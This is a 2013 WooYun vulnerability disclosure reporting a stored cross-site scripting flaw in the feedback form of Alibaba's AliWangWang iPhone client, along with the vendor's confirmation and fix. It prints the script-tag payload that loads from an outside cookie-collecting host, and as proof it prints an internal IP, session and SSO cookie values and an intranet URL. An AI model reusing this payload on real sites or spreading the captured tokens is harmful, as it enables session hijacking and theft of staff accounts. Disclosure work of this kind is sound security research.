漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2013-017693
漏洞标题:阿里巴巴xss跨站漏洞可获得内网cookies
相关厂商:阿里巴巴
漏洞作者: 阿峰
提交时间:2013-01-23 08:37
修复时间:2013-03-09 08:38
公开时间:2013-03-09 08:38
漏洞类型:xss跨站脚本攻击
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2013-01-23: 细节已通知厂商并且等待厂商处理中
2013-01-24: 厂商已经确认,细节仅向厂商公开
2013-02-03: 细节向核心白帽子及相关领域专家公开
2013-02-13: 细节向普通白帽子公开
2013-02-23: 细节向实习白帽子公开
2013-03-09: 细节向公众公开
简要描述:
xss漏洞,大家都懂的,可获得cookies
详细说明:
只是抱着试试看的态度,没想到真的出现了...
该漏洞是出现在阿里旺旺的手机客户端,由于我同时测试的旺信和阿里旺旺两个软件,都属于阿里巴巴,所以不知道是哪一个出现的。为了安全,没再测试,直接来提交了。
测试版本为手机iphone版,
在软件的【反馈】里写入xss测试代码,
<script src="http://xss.sh3llc0de.com/?u=ddc05c"></script>
提交成功。
十分钟之内没有收到cookies,就失望了,但刚才去看了看...哈哈。
漏洞证明:
信息
IP:121.0.29.205
地址:中国浙江杭州电信企业阿里巴巴公司
操作系统:Windows XP
浏览器:Chrome 24.0.1312.52
时间:2013-01-22 19:06:45
cookies
USER_COOKIE=BDC4D499AACAC40F7021847DB20A7620; SSO_TOKEN=594E51ADB89572C8F71E9C45F25A3684020D1640DEDF9946EAD585C231395E6711ED2B70672DF1CDFC2D299A49F5CB04; LAST_HEART_BEAT_TIME=9411E114E035D380C6A967891863C6D3; JSESSIONID=1g8tf43ade2j2e8ihhzxm20lk
地址
http://172.22.7.46:8080/usersuggestion/index.do?source=ios
修复方案:
过滤非法字符...
版权声明:转载请注明来源 阿峰@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:8
确认时间:2013-01-24 13:22
厂商回复:
非常感谢您对阿里巴巴的关注,您反馈的问题我们已经修复完毕。谢谢,稍后会发送礼品表示感谢~~ O(∩_∩)O
最新状态:
暂无